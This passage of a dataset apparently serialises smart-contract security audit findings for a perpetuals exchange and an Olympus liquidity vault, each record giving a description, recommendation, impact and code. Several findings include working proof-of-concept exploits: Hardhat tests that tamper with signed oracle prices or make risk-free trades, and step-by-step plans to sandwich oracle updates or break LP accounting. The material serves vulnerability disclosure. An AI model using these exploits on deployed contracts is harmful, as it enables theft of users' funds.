createOrder(fixture, params);\\n expect(await getOrderCount(dataStore)).eq(1);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(0);\\n expect(await getPositionCount(dataStore)).eq(0);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(0);\\n\\n await expect(executeOrder(fixture)).to.be.reverted;\\n\\n await mine(50);\\n\\n await attackContract.flipSwitch();\\n\\n expect(await getOrderCount(dataStore)).eq(1);\\n\\n await executeOrder(fixture, {\\n minPrices: [expandDecimals(5000, 4), expandDecimals(1, 6)],\\n maxPrices: [expandDecimals(5000, 4), expandDecimals(1, 6)],\\n });\\n\\n expect(await getOrderCount(dataStore)).eq(0);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(1);\\n expect(await getPositionCount(dataStore)).eq(1);\\n\\n await handleOrder(fixture, {\\n create: {\\n account: attackContract,\\n market: ethUsdMarket,\\n initialCollateralToken: wnt,\\n initialCollateralDeltaAmount: 0,\\n sizeDeltaUsd: decimalToFloat(200 * 1000),\\n acceptablePrice: 6001,\\n orderType: OrderType.MarketDecrease,\\n isLong: true,\\n gasUsageLabel: \"orderHandler.createOrder\",\\n swapPath: [ethUsdMarket.marketToken],\\n },\\n execute: {\\n minPrices: [expandDecimals(6000, 4), expandDecimals(1, 6)],\\n maxPrices: [expandDecimals(6000, 4), expandDecimals(1, 6)],\\n gasUsageLabel: \"orderHandler.executeOrder\",\\n },\\n });\\n\\n const WNTAfter = await wnt.balanceOf(attackContract.address);\\n const UsdcAfter = await usdc.balanceOf(attackContract.address);\\n\\n expect(UsdcAfter).to.gt(\\n expandDecimals(100 * 1000, 6)\\n .mul(999)\\n .div(1000)\\n );\\n expect(UsdcAfter).to.lt(\\n expandDecimals(100 * 1000, 6)\\n .mul(1001)\\n .div(1000)\\n );\\n expect(WNTAfter).to.eq(0);\\n }).timeout(100000);\\n```\\nчThere need to be a way to cap the length of the path to control user input:\\nuint y = 10; require(swapPath.length < y ,\"path too long\");чThe attack would allow to make free trades in 
terms of risk. You can trade without any risk by controlling when to execute the transactionч```\\n function createOrder(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n OrderVault orderVault,\\n IReferralStorage referralStorage,\\n address account,\\n BaseOrderUtils.CreateOrderParams memory params\\n ) external returns (bytes32) {\\n ReferralUtils.setTraderReferralCode(referralStorage, account, params.referralCode);\\n\\n uint256 initialCollateralDeltaAmount;\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n bool shouldRecordSeparateExecutionFeeTransfer = true;\\n\\n if (\\n params.orderType == Order.OrderType.MarketSwap ||\\n params.orderType == Order.OrderType.LimitSwap ||\\n params.orderType == Order.OrderType.MarketIncrease ||\\n params.orderType == Order.OrderType.LimitIncrease\\n ) {\\n initialCollateralDeltaAmount = orderVault.recordTransferIn(params.addresses.initialCollateralToken);\\n if (params.addresses.initialCollateralToken == wnt) {\\n if (initialCollateralDeltaAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(initialCollateralDeltaAmount, params.numbers.executionFee);\\n }\\n initialCollateralDeltaAmount -= params.numbers.executionFee;\\n shouldRecordSeparateExecutionFeeTransfer = false;\\n }\\n } else if (\\n params.orderType == Order.OrderType.MarketDecrease ||\\n params.orderType == Order.OrderType.LimitDecrease ||\\n params.orderType == Order.OrderType.StopLossDecrease\\n ) {\\n initialCollateralDeltaAmount = params.numbers.initialCollateralDeltaAmount;\\n } else {\\n revert OrderTypeCannotBeCreated(params.orderType);\\n }\\n\\n if (shouldRecordSeparateExecutionFeeTransfer) {\\n uint256 wntAmount = orderVault.recordTransferIn(wnt);\\n if (wntAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(wntAmount, params.numbers.executionFee);\\n }\\n\\n GasUtils.handleExcessExecutionFee(\\n dataStore,\\n orderVault,\\n wntAmount,\\n params.numbers.executionFee\\n );\\n 
}\\n\\n // validate swap path markets\\n MarketUtils.getEnabledMarkets(\\n dataStore,\\n params.addresses.swapPath\\n );\\n\\n Order.Props memory order;\\n\\n order.setAccount(account);\\n order.setReceiver(params.addresses.receiver);\\n order.setCallbackContract(params.addresses.callbackContract);\\n order.setMarket(params.addresses.market);\\n order.setInitialCollateralToken(params.addresses.initialCollateralToken);\\n order.setSwapPath(params.addresses.swapPath);\\n order.setOrderType(params.orderType);\\n order.setDecreasePositionSwapType(params.decreasePositionSwapType);\\n order.setSizeDeltaUsd(params.numbers.sizeDeltaUsd);\\n order.setInitialCollateralDeltaAmount(initialCollateralDeltaAmount);\\n order.setTriggerPrice(params.numbers.triggerPrice);\\n order.setAcceptablePrice(params.numbers.acceptablePrice);\\n order.setExecutionFee(params.numbers.executionFee);\\n order.setCallbackGasLimit(params.numbers.callbackGasLimit);\\n order.setMinOutputAmount(params.numbers.minOutputAmount);\\n order.setIsLong(params.isLong);\\n order.setShouldUnwrapNativeToken(params.shouldUnwrapNativeToken);\\n\\n ReceiverUtils.validateReceiver(order.receiver());\\n\\n if (order.initialCollateralDeltaAmount() == 0 && order.sizeDeltaUsd() == 0) {\\n revert BaseOrderUtils.EmptyOrder();\\n }\\n\\n CallbackUtils.validateCallbackGasLimit(dataStore, order.callbackGasLimit());\\n\\n uint256 estimatedGasLimit = GasUtils.estimateExecuteOrderGasLimit(dataStore, order);\\n GasUtils.validateExecutionFee(dataStore, estimatedGasLimit, order.executionFee());\\n\\n bytes32 key = NonceUtils.getNextKey(dataStore);\\n\\n order.touch();\\n OrderStoreUtils.set(dataStore, key, order);\\n\\n OrderEventUtils.emitOrderCreated(eventEmitter, key, order);\\n\\n return key;\\n}\\n```\\n -Multiplication after Division error leading to larger precision lossчmediumчThere are a couple of instances of using the result of a division for multiplication, which can cause larger precision loss.\\n```\\nFile: 
MarketUtils.sol\\n\\n cache.fundingUsd = (cache.sizeOfLargerSide / Precision.FLOAT_PRECISION) * cache.durationInSeconds * cache.fundingFactorPerSecond;\\n\\n if (result.longsPayShorts) {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithLongCollateral / cache.oi.longOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithShortCollateral / cache.oi.longOpenInterest;\\n } else {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithLongCollateral / cache.oi.shortOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithShortCollateral / cache.oi.shortOpenInterest;\\n }\\n```\\n\\nLink to Code\\nIn the above case, the value of `cache.fundingUsd` is calculated by first dividing `cache.sizeOfLargerSide` by `Precision.FLOAT_PRECISION`, which is `10**30`. Then the resultant is multiplied further. This results in a larger loss of precision.\\nLater the same `cache.fundingUsd` is used to calculate `cache.fundingUsdForLongCollateral` and `cache.fundingUsdForShortCollateral` by multiplying further, which makes the precision error even bigger.\\nSame issue is there in calculating `cache.positionPnlUsd` in `PositionUtils`.\\n```\\nFile: PositionUtils.sol\\n\\n if (position.isLong()) {\\n cache.sizeDeltaInTokens = Calc.roundUpDivision(position.sizeInTokens() * sizeDeltaUsd, position.sizeInUsd());\\n } else {\\n cache.sizeDeltaInTokens = position.sizeInTokens() * sizeDeltaUsd / position.sizeInUsd();\\n }\\n }\\n\\n cache.positionPnlUsd = cache.totalPositionPnl * cache.sizeDeltaInTokens.toInt256() / position.sizeInTokens().toInt256();\\n```\\n\\nLink to CodeчFirst multiply all the numerators and then divide by the product of all the denominators.чPrecision Loss in accounting.ч```\\nFile: MarketUtils.sol\\n\\n cache.fundingUsd = (cache.sizeOfLargerSide / Precision.FLOAT_PRECISION) * cache.durationInSeconds * 
cache.fundingFactorPerSecond;\\n\\n if (result.longsPayShorts) {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithLongCollateral / cache.oi.longOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithShortCollateral / cache.oi.longOpenInterest;\\n } else {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithLongCollateral / cache.oi.shortOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithShortCollateral / cache.oi.shortOpenInterest;\\n }\\n```\\n -when execute deposit fails, cancel deposit will be called which means that execution fee for keeper will be little for executing the cancellation depending on where the executeDeposit failsчmediumчWhen execute deposit fails, the deposit will be automatically cancelled. However, since executeDeposit has taken up a portion of the execution fee, execution fee left for cancellation might be little and keeper will lose out on execution fee.\\nIn `executeDeposit` when an error is thrown, `_handleDepositError` is called.\\n```\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n```\\n\\nNotice that in `_handleDepositError` that `cancelDeposit` is called which will pay execution fee to the keeper. 
However, since the failure can occur at a late stage of executeDeposit, the execution fee left for the cancellation will be little for the keeper.\\n```\\n function _handleDepositError(\\n bytes32 key,\\n uint256 startingGas,\\n bytes memory reasonBytes\\n ) internal {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n\\n bytes4 errorSelector = ErrorUtils.getErrorSelectorFromData(reasonBytes);\\n\\n\\n if (OracleUtils.isEmptyPriceError(errorSelector)) {\\n ErrorUtils.revertWithCustomError(reasonBytes);\\n }\\n\\n\\n DepositUtils.cancelDeposit(\\n dataStore,\\n eventEmitter,\\n depositVault,\\n key,\\n msg.sender,\\n startingGas,\\n reason,\\n reasonBytes\\n );\\n }\\n}\\n```\\n\\nNote: This also applies to failed `executeWithdrawal`.чRecommend increasing the minimum required execution fee to account for failed deposits and refund the excess to the user when a deposit succeeds.чKeeper will lose out on execution fee in the event of a failed deposit.ч```\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n```\\n -The oracle price could be tamperedчmediumчThe `_setPrices()` function does not check for duplicated price indexes. 
Attackers such as malicious order keepers can exploit it to tamper signed prices.\\nThe following test script shows how it works\\n```\\nimport { expect } from \"chai\";\\n\\nimport { deployContract } from \"../../utils/deploy\";\\nimport { deployFixture } from \"../../utils/fixture\";\\nimport {\\n TOKEN_ORACLE_TYPES,\\n signPrices,\\n getSignerInfo,\\n getCompactedPrices,\\n getCompactedPriceIndexes,\\n getCompactedDecimals,\\n getCompactedOracleBlockNumbers,\\n getCompactedOracleTimestamps,\\n} from \"../../utils/oracle\";\\nimport { printGasUsage } from \"../../utils/gas\";\\nimport { grantRole } from \"../../utils/role\";\\nimport * as keys from \"../../utils/keys\";\\n\\ndescribe(\"AttackOracle\", () => {\\n const { provider } = ethers;\\n\\n let user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9;\\n let roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc;\\n let oracleSalt;\\n\\n beforeEach(async () => {\\n const fixture = await deployFixture();\\n ({ user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9 } = fixture.accounts);\\n\\n ({ roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc } = fixture.contracts);\\n ({ oracleSalt } = fixture.props);\\n });\\n\\n it(\"inits\", async () => {\\n expect(await oracle.oracleStore()).to.eq(oracleStore.address);\\n expect(await oracle.SALT()).to.eq(oracleSalt);\\n });\\n\\n it(\"tamperPrices\", async () => {\\n const blockNumber = (await provider.getBlock()).number;\\n const blockTimestamp = (await provider.getBlock()).timestamp;\\n await dataStore.setUint(keys.MIN_ORACLE_SIGNERS, 2);\\n const block = await provider.getBlock(blockNumber);\\n\\n let signerInfo = getSignerInfo([0, 1]);\\n let minPrices = [1000, 1000]; // if some signers sign a same price\\n let maxPrices = [1010, 1010]; // if some signers sign a same price\\n let signatures = await signPrices({\\n signers: [signer0, signer1],\\n salt: oracleSalt,\\n minOracleBlockNumber: 
blockNumber,\\n maxOracleBlockNumber: blockNumber,\\n oracleTimestamp: blockTimestamp,\\n blockHash: block.hash,\\n token: wnt.address,\\n tokenOracleType: TOKEN_ORACLE_TYPES.DEFAULT,\\n precision: 1,\\n minPrices,\\n maxPrices,\\n });\\n\\n // attacker tamper the prices and indexes\\n minPrices[1] = 2000\\n maxPrices[1] = 2020\\n let indexes = getCompactedPriceIndexes([0, 0]) // share the same index\\n\\n await oracle.setPrices(dataStore.address, eventEmitter.address, {\\n priceFeedTokens: [],\\n signerInfo,\\n tokens: [wnt.address],\\n compactedMinOracleBlockNumbers: [blockNumber],\\n compactedMaxOracleBlockNumbers: [blockNumber],\\n compactedOracleTimestamps: [blockTimestamp],\\n compactedDecimals: getCompactedDecimals([1]),\\n compactedMinPrices: getCompactedPrices(minPrices),\\n compactedMinPricesIndexes: indexes,\\n compactedMaxPrices: getCompactedPrices(maxPrices),\\n compactedMaxPricesIndexes: indexes,\\n signatures,\\n });\\n\\n const decimals = 10\\n expect((await oracle.getPrimaryPrice(wnt.address)).min).eq(1500 * decimals);\\n expect((await oracle.getPrimaryPrice(wnt.address)).max).eq(1515 * decimals);\\n });\\n\\n});\\n```\\n\\nThe output\\n```\\n> npx hardhat test .\\test\\oracle\\AttackOracle.ts\\n\\n\\n AttackOracle\\n √ inits\\n √ tamperPrices (105ms)\\n\\n\\n 2 passing (13s)\\n```\\nчDon't allow duplicated prices indexesчSteal funds from the vault and markets.ч```\\nimport { expect } from \"chai\";\\n\\nimport { deployContract } from \"../../utils/deploy\";\\nimport { deployFixture } from \"../../utils/fixture\";\\nimport {\\n TOKEN_ORACLE_TYPES,\\n signPrices,\\n getSignerInfo,\\n getCompactedPrices,\\n getCompactedPriceIndexes,\\n getCompactedDecimals,\\n getCompactedOracleBlockNumbers,\\n getCompactedOracleTimestamps,\\n} from \"../../utils/oracle\";\\nimport { printGasUsage } from \"../../utils/gas\";\\nimport { grantRole } from \"../../utils/role\";\\nimport * as keys from \"../../utils/keys\";\\n\\ndescribe(\"AttackOracle\", () => {\\n const 
{ provider } = ethers;\\n\\n let user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9;\\n let roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc;\\n let oracleSalt;\\n\\n beforeEach(async () => {\\n const fixture = await deployFixture();\\n ({ user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9 } = fixture.accounts);\\n\\n ({ roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc } = fixture.contracts);\\n ({ oracleSalt } = fixture.props);\\n });\\n\\n it(\"inits\", async () => {\\n expect(await oracle.oracleStore()).to.eq(oracleStore.address);\\n expect(await oracle.SALT()).to.eq(oracleSalt);\\n });\\n\\n it(\"tamperPrices\", async () => {\\n const blockNumber = (await provider.getBlock()).number;\\n const blockTimestamp = (await provider.getBlock()).timestamp;\\n await dataStore.setUint(keys.MIN_ORACLE_SIGNERS, 2);\\n const block = await provider.getBlock(blockNumber);\\n\\n let signerInfo = getSignerInfo([0, 1]);\\n let minPrices = [1000, 1000]; // if some signers sign a same price\\n let maxPrices = [1010, 1010]; // if some signers sign a same price\\n let signatures = await signPrices({\\n signers: [signer0, signer1],\\n salt: oracleSalt,\\n minOracleBlockNumber: blockNumber,\\n maxOracleBlockNumber: blockNumber,\\n oracleTimestamp: blockTimestamp,\\n blockHash: block.hash,\\n token: wnt.address,\\n tokenOracleType: TOKEN_ORACLE_TYPES.DEFAULT,\\n precision: 1,\\n minPrices,\\n maxPrices,\\n });\\n\\n // attacker tamper the prices and indexes\\n minPrices[1] = 2000\\n maxPrices[1] = 2020\\n let indexes = getCompactedPriceIndexes([0, 0]) // share the same index\\n\\n await oracle.setPrices(dataStore.address, eventEmitter.address, {\\n priceFeedTokens: [],\\n signerInfo,\\n tokens: [wnt.address],\\n compactedMinOracleBlockNumbers: [blockNumber],\\n compactedMaxOracleBlockNumbers: [blockNumber],\\n compactedOracleTimestamps: [blockTimestamp],\\n compactedDecimals: 
getCompactedDecimals([1]),\\n compactedMinPrices: getCompactedPrices(minPrices),\\n compactedMinPricesIndexes: indexes,\\n compactedMaxPrices: getCompactedPrices(maxPrices),\\n compactedMaxPricesIndexes: indexes,\\n signatures,\\n });\\n\\n const decimals = 10\\n expect((await oracle.getPrimaryPrice(wnt.address)).min).eq(1500 * decimals);\\n expect((await oracle.getPrimaryPrice(wnt.address)).max).eq(1515 * decimals);\\n });\\n\\n});\\n```\\n -boundedSub() might fail to return the result that is bounded to prevent overflowsчmediumчThe goal of `boundedSub()` is to bound the result regardless what the inputs are to prevent overflows/underflows. However, the goal is not achieved for some cases. As a result, `boundedSub()` still might underflow and still might revert. The goal of the function is not achieved.\\nAs a result, the protocol might not be fault-tolerant as it is supposed to be - when `boundedSub()` is designed to not revert in any case, it still might revert. For example, function `MarketUtils.getNextFundingAmountPerSize()` will be affected.\\n`boundedSub()` is designed to always bound its result between `type(int256).min` and `type(int256).max` so that it will never overflow/underflow:\\nIt achieves its goal in three cases:\\nCase 1: `if either a or b is zero or the signs are the same there should not be any overflow`.\\nCase 2: `a > 0`, and `b < 0`, and `a-b > type(int256).max`, then we need to return `type(int256).max`.\\nCase 3: `a < 0`, and `b > 0`, and a - b < `type(int256).min`, then we need to return `type(int256).min`\\nUnfortunately, the third case is implemented wrongly as follows:\\n```\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n if (a < 0 && b <= type(int256).min - a) {\\n return type(int256).min;\\n }\\n```\\n\\nwhich essentially is checking a < 0 && b + a <= `type(int256).min`, a wrong condition to check. 
Because of using this wrong condition, underflow cases will not be detected and the function will revert instead of returning `type(int256).min` in this case.\\nTo verify, suppose a = `type(int256).min` and b = 1, `a-b` needs to be bounded to prevent underflow and the function should have returned `type(int256).min`. However, the function will fail the condition, as a result, it will not execute the if part, and the following final line will be executed instead:\\n```\\nreturn a - b;\\n```\\n\\nAs a result, instead of returning the minimum, the function will revert in the last line due to underflow. This violates the property of the function: it should have returned the bounded result `type(int256).min` and should not have reverted in any case.\\nThe following POC in Remix can show that the following function will revert:\\n```\\nfunction testBoundedSub() public pure returns (int256){\\n return boundedSub(type(int256).min+3, 4);\\n}\\n```\\nчThe correction is as follows:\\n```\\n function boundedSub(int256 a, int256 b) internal pure returns (int256) {\\n // if either a or b is zero or the signs are the same there should not be any overflow\\n if (a == 0 || b == 0 || (a > 0 && b > 0) || (a < 0 && b < 0)) {\\n return a // Remove the line below\\n b;\\n }\\n\\n // if adding `// Remove the line below\\nb` to `a` would result in a value greater than the max int256 value\\n // then return the max int256 value\\n if (a > 0 && // Remove the line below\\nb >= type(int256).max // Remove the line below\\n a) {\\n return type(int256).max;\\n }\\n\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n// Remove the line below\\n if (a < 0 && b <= type(int256).min // Remove the line below\\n a) {\\n// Add the line below\\n if (a < 0 && a <= type(int256).min // Add the line below\\n b) {\\n return type(int256).min;\\n }\\n\\n return a // Remove the line below\\n b;\\n }\\n```\\nч`boundedSub()` does not 
guarantee underflow/overflow free as it is designed to be. As a result, the protocol might break at points when it is not supposed to break. For example, function `MarketUtils.getNextFundingAmountPerSize()` will be affected.ч```\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n if (a < 0 && b <= type(int256).min - a) {\\n return type(int256).min;\\n }\\n```\\n -Adversary can sandwich oracle updates to exploit vaultчhighчBLVaultLido added a mechanism to siphon off all wstETH obtained from mismatched pool and oracle prices. This was implemented to fix the problem that the vault could be manipulated to the attackers gain. This mitigation however does not fully address the issue and the same issue is still exploitable by sandwiching oracle update.\\nBLVaultLido.sol#L232-L240\\n```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n```\\n\\nIn the above lines we can see that the current oracle price is used to calculate the expected amount of wstETH to return to the user. In theory this should prevent the attack but an attacker can side step this sandwiching the oracle update.\\nExample:\\nThe POC is very similar to before except now it's composed of two transactions sandwiching the oracle update. Chainlink oracles have a tolerance threshold of 0.5% before updating so we will use that as our example value. The current price is assumed to be 0.995 wstETH/OHM. 
The oracle price (which is about to be updated) is currently 1:1\\n```\\nTransaction 1:\\n\\nBalances before attack (0.995:1)\\nLiquidity: 79.8 OHM 80.2 wstETH\\nAdversary: 20 wstETH\\n\\nSwap OHM so that pool price matches pre-update oracle price:\\nLiquidity: 80 OHM 80 wstETH\\nAdversary: -0.2 OHM 20.2 wstETH\\n\\nBalances after adversary has deposited to the pool:\\nLiquidity: 100 OHM 100 wstETH\\nAdversary: -0.2 OHM 0.2 wstETH\\n\\nBalances after adversary sells wstETH for OHM (0.5% movement in price):\\nLiquidity: 99.748 OHM 100.252 wstETH\\nAdversary: 0.052 OHM -0.052 wstETH\\n\\nSandwiched Oracle Update:\\n\\nOracle updates price of wstETH to 0.995 OHM. Since the attacker already sold wstETH to balance \\nthe pool to the post-update price they will be able to withdraw the full amount of wstETH.\\n\\nTransaction 2:\\n\\nBalances after adversary removes their liquidity:\\nLiquidity: 79.798 OHM 80.202 wstETH\\nAdversary: 0.052 OHM 19.998 wstETH\\n\\nBalances after selling profited OHM:\\nLiquidity: 79.849 OHM 80.152 wstETH\\nAdversary: 20.05 wstETH\\n```\\n\\nAs shown above it's still profitable to exploit the vault by sandwiching the oracle updates. With each oracle update the pool can be repeatedly attacked causing large losses.чTo prevent this I would recommend locking the user into the vault for some minimum amount of time (i.e. 24 hours)чVault will be attacked repeatedly for large lossesч```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? 
expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n```\\n -minTokenAmounts_ is useless in new configuration and doesn't provide any real slippage protectionчhighчBLVaultLido#withdraw skims off extra stETH from the user that results from oracle arb. The problem with this is that minTokenAmounts_ no longer provides any slippage protection because it only ensures that enough is received from the liquidity pool but never enforces how much is received by the user.\\nBLVaultLido.sol#L224-L247\\n```\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n\\n // Calculate OHM and wstETH amounts received\\n uint256 ohmAmountOut = ohm.balanceOf(address(this)) - ohmBefore;\\n uint256 wstethAmountOut = wsteth.balanceOf(address(this)) - wstethBefore;\\n\\n // Calculate oracle expected wstETH received amount\\n // getTknOhmPrice returns the amount of wstETH per 1 OHM based on the oracle price\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n\\n // Burn OHM\\n ohm.increaseAllowance(MINTR(), ohmAmountOut);\\n manager.burnOhmFromVault(ohmAmountOut);\\n\\n // Return wstETH to owner\\n wsteth.safeTransfer(msg.sender, wstethToReturn);\\n```\\n\\nminTokenAmounts_ only applies to the removal of liquidity. Since wstETH is skimmed off to the treasury the user no longer has any way to protect themselves from slippage. 
As shown in my other submission, oracle slop can lead to loss of funds due to this skimming.чAllow the user to specify the amount of wstETH they receive AFTER the arb is skimmed.чUsers cannot protect themselves from oracle slop/wstETH skimmingч```\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n\\n // Calculate OHM and wstETH amounts received\\n uint256 ohmAmountOut = ohm.balanceOf(address(this)) - ohmBefore;\\n uint256 wstethAmountOut = wsteth.balanceOf(address(this)) - wstethBefore;\\n\\n // Calculate oracle expected wstETH received amount\\n // getTknOhmPrice returns the amount of wstETH per 1 OHM based on the oracle price\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n\\n // Burn OHM\\n ohm.increaseAllowance(MINTR(), ohmAmountOut);\\n manager.burnOhmFromVault(ohmAmountOut);\\n\\n // Return wstETH to owner\\n wsteth.safeTransfer(msg.sender, wstethToReturn);\\n```\\n -Adversary can stake LP directly for the vault then withdraw to break lp accounting in BLVaultManagerLidoчhighчThe AuraRewardPool allows users to stake directly for other users. In this case the malicious user could stake LP directly for their vault then call withdraw on their vault. This would cause the LP tracking to break on BLVaultManagerLido. 
The result is that some users would now be permanently trapped because their vault would revert when trying to withdraw.\\nBaseRewardPool.sol#L196-L207\\n```\\nfunction stakeFor(address _for, uint256 _amount)\\n    public\\n    returns(bool)\\n{\\n    _processStake(_amount, _for);\\n\\n    //take away from sender\\n    stakingToken.safeTransferFrom(msg.sender, address(this), _amount);\\n    emit Staked(_for, _amount);\\n    \\n    return true;\\n}\\n```\\n\\nAuraRewardPool allows users to stake directly for another address with them receiving the staked tokens.\\nBLVaultLido.sol#L218-L224\\n```\\n        manager.decreaseTotalLp(lpAmount_);\\n\\n        // Unstake from Aura\\n        auraRewardPool().withdrawAndUnwrap(lpAmount_, claim_);\\n\\n        // Exit Balancer pool\\n        _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n```\\n\\nOnce the LP has been staked the adversary can immediately withdraw it from their vault. This calls decreaseTotalLp on BLVaultManagerLido, which now permanently breaks the LP accounting.\\nBLVaultManagerLido.sol#L277-L280\\n```\\nfunction decreaseTotalLp(uint256 amount_) external override onlyWhileActive onlyVault {\\n    if (amount_ > totalLp) revert BLManagerLido_InvalidLpAmount();\\n    totalLp -= amount_;\\n}\\n```\\n\\nIf the amount_ is ever greater than totalLp it will cause decreaseTotalLp to revert. By withdrawing LP that was never deposited to a vault, it permanently prevents other users from being able to withdraw.\\nExample: User A deposits wstETH to their vault which yields 50 LP. User B creates a vault then stakes 50 LP and withdraws it from his vault. The manager now thinks there is 0 LP in vaults. When User A tries to withdraw their LP it will revert when it calls manager.decreaseTotalLp.
User A is now permanently trapped in the vault.чIndividual vaults should track how much they have deposited and shouldn't be allowed to withdraw more than deposited.чLP accounting is broken and users are permanently trapped.ч```\\nfunction stakeFor(address _for, uint256 _amount)\\n public\\n returns(bool)\\n{\\n _processStake(_amount, _for);\\n\\n //take away from sender\\n stakingToken.safeTransferFrom(msg.sender, address(this), _amount);\\n emit Staked(_for, _amount);\\n \\n return true;\\n}\\n```\\n -Users can abuse discrepancies between oracle and true asset price to mint more OHM than needed and profit from itчhighчAll chainlink oracles have a deviation threshold between the current price of the asset and the on-chain price for that asset. The more oracles used for determining the price the larger the total discrepancy can be. These can be combined and exploited to mint more OHM than expected and profit.\\nBLVaultLido.sol#L156-L171\\n```\\n uint256 ohmWstethPrice = manager.getOhmTknPrice();\\n uint256 ohmMintAmount = (amount_ * ohmWstethPrice) / _WSTETH_DECIMALS;\\n\\n // Block scope to avoid stack too deep\\n {\\n // Cache OHM-wstETH BPT before\\n uint256 bptBefore = liquidityPool.balanceOf(address(this));\\n\\n // Transfer in wstETH\\n wsteth.safeTransferFrom(msg.sender, address(this), amount_);\\n\\n // Mint OHM\\n manager.mintOhmToVault(ohmMintAmount);\\n\\n // Join Balancer pool\\n _joinBalancerPool(ohmMintAmount, amount_, minLpAmount_);\\n```\\n\\nThe amount of OHM to mint and deposit is determined by the calculated price from the on-chain oracle prices.\\nBLVaultLido.sol#L355-L364\\n```\\n uint256[] memory maxAmountsIn = new uint256[](2);\\n maxAmountsIn[0] = ohmAmount_;\\n maxAmountsIn[1] = wstethAmount_;\\n\\n JoinPoolRequest memory joinPoolRequest = JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, maxAmountsIn, minLpAmount_),\\n fromInternalBalance: false\\n });\\n```\\n\\nTo make the issue worse, 
_joinBalancerPool use 1 for the join type. This is the EXACT_TOKENS_IN_FOR_BPT_OUT method of joining. What this means is that the join will guaranteed use all input tokens. If the current pool isn't balanced in the same way then the join request will effectively swap one token so that the input tokens match the current pool. Now if the ratio is off then too much OHM will be minted and will effectively traded for wstETH. This allows the user to withdraw at a profit once the oracle has been updated the discrepancy is gone.чThe vault needs to have withdraw and/or deposit fees to make attacks like this unprofitable.чUsers can always time oracles so that they enter at an advantageous price and the deficit is paid by Olympus with minted OHMч```\\n uint256 ohmWstethPrice = manager.getOhmTknPrice();\\n uint256 ohmMintAmount = (amount_ * ohmWstethPrice) / _WSTETH_DECIMALS;\\n\\n // Block scope to avoid stack too deep\\n {\\n // Cache OHM-wstETH BPT before\\n uint256 bptBefore = liquidityPool.balanceOf(address(this));\\n\\n // Transfer in wstETH\\n wsteth.safeTransferFrom(msg.sender, address(this), amount_);\\n\\n // Mint OHM\\n manager.mintOhmToVault(ohmMintAmount);\\n\\n // Join Balancer pool\\n _joinBalancerPool(ohmMintAmount, amount_, 